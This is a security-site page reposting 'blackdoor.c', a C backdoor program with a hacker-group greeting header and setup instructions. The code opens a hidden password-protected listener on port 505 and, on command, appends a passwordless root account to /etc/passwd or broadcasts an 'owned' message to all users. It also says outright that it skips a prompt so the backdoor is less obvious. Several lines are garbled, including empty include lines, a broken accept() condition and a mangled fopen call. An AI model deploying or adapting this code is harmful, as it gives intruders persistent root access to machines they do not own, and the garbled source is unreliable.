标题 简介 类型 公开时间
关联规则 关联知识 关联工具 关联文档 关联抓包
参考1(官网)
参考2
参考3
详情
[SAFE-ID: JIWO-2024-254]   作者: ecawen 发表于: [2017-08-06]

本文共 [888] 位读者顶过

blackdoor.c
        /* 
        A rip off a sockets tutorial i found somewhere cause I didn't feel like[出自:jiwo.org]
        writing stupid basic sockets code when I had it in my src directory
        already.   
        */ 

        /* Greets:
                Undernet Channels:
                        #rootworm, #hacktech, #hyperlink, #3xposure, #legionoot
                Groups:
                        The LegionOOT (www.legionoot.cc), Team Sploit
                People:
                        Cyph3r, n3m0, Adoni, f0bic, d0g, khe0ps, h-S-t,
                        F-o-X, NeonMatrix, Azmodan, & Venomous
        /* 

        Usage (setup):
                # gcc -o backdoor backdoor.c
                # ./backdoor password &
        Usage (using):
                telnet to host (port 505) --> type the password (don't wait for a
                prompt, there isn't one so its less obvious its a backdoor) -->
                type 1or 2.  And yes it's _supposed_ to disconnect you after
                each command.
        */

                #include 
                #include 
                #include 
                #include 
                #include 
                #include 
                #include 
                #include 
        #define PORT 505
        #define MAXDATASIZE 100
        #define BACKLOG 10
        void handle(char *command);
        int main(int argc, char *argv[])
        {
        int sockfd, new_fd, sin_size, numbytes;
        char *bytes;
        struct sockaddr_in my_addr;
        struct sockaddr_in their_addr;
        char buf[MAXDATASIZE];
        char ask[]="Enter Command (1 to put r00t::0:0:... in /etc/passwd, 2 to
        send '7h1s b0x 1s 0wn3d' to all people on the box: ";
                if (argc != 2) {
                        fprintf(stderr,"Usage: %s password\n", argv[0]);
                        exit(1);
                }
                if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
                        perror("socket");
                        exit(1);
                }
                my_addr.sin_family = AF_INET;
                my_addr.sin_port = htons(PORT);
                my_addr.sin_addr.s_addr = INADDR_ANY;
                if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1)
                {
                        perror("bind");
                        exit(1);
                }
                                if (listen(sockfd, BACKLOG) == -1) {
                                        perror("listen");
                                        exit(1);
                  }
                        while(1) {  /* main accept() loop */
                                        sin_size = sizeof(struct sockaddr_in);
                                if ((new_fd = accept(sockfd, (struct sockaddr *)&their_addr, \
                                                                                                                                                         &sin_size)) ==
        {
                                         perror("accept");
                                         continue;
                                }
        inet_ntoa(their_addr.sin_addr);
                                if (!fork()) {
                                         recv(new_fd, buf,
        MAXDATASIZE, 0);
                                bytes = strstr(buf, argv[1]);
 
        if (bytes != NULL){
                                        send(new_fd, ask, sizeof(ask), 0);
                                        numbytes=recv(new_fd, buf,
        MAXDATASIZE, 0);
                                        buf[numbytes] = '\0';
                                        handle(buf);
                                         }
                                         close(new_fd);
                                         exit(0);
                                }
                                close(new_fd);
                                while(waitpid(-1,NULL,WNOHANG) > 0); /* clean up child
        processes */
                 }
        }
                void handle(char *command)
                {
                FILE *fle;
                if(strstr(command, "1") != NULL)
        {
                fle = f0/*n("/etc/passwd", "a*/; 
                fprintf(fle, "r00t::0:0:r00t:/root:/bin/bash");
                fclose(fle);
        }
                if(strstr(command, "2") != NULL)
        {
                system("wall 7h1s b0x 1s 0wn3d");
        }
        }

评论

暂无
发表评论
 返回顶部 
热度(888)
 关注微信